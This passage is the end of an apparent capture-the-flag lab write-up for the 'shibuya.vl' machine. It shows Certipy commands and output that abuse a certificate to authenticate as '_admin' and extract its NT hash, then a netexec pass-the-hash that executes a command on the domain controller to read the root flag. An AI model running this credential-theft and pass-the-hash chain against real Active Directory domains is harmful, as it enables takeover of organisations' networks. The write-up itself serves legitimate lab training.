[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN '_admin'
[*] Certificate has no object SID
[*] Saved certificate and private key to '_admin.pfx'

This command successfully generated a certificate and private key (_admin.pfx) that could be used to authenticate as the _admin user.

This certificate was then used with certipy auth to perform a Kerberos authentication and retrieve the _admin user’s NT hash.

┌──(toothless5143㉿kali)-[~]
└─$ certipy auth -pfx _admin.pfx -domain shibuya.vl -username _admin -dc-ip 10.10.83.243
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: _admin@shibuya.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to '_admin.ccache'
[*] Trying to retrieve NT hash for '_admin'
[*] Got hash for '_admin@shibuya.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

With the NT hash of a domain administrator, full control was achieved. The final step was to use this hash with netexec in a Pass-the-Hash attack to execute a command on the domain controller and read the root flag from the administrator’s desktop.

┌──(toothless5143㉿kali)-[~]
└─$ proxychains -q netexec smb shibuya.vl -u _admin -H <REDACTED> -x 'type c:\users\administrator\desktop\root.txt'

SMB         10.10.64.180    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.180    445    AWSJPDC0522      [+] shibuya.vl\_admin:<REDACTED>(Pwn3d!)
SMB         10.10.64.180    445    AWSJPDC0522      [+] Executed command via wmiexec
SMB         10.10.64.180    445    AWSJPDC0522      VL{<REDACTED>}

Signing out,

  • Toothless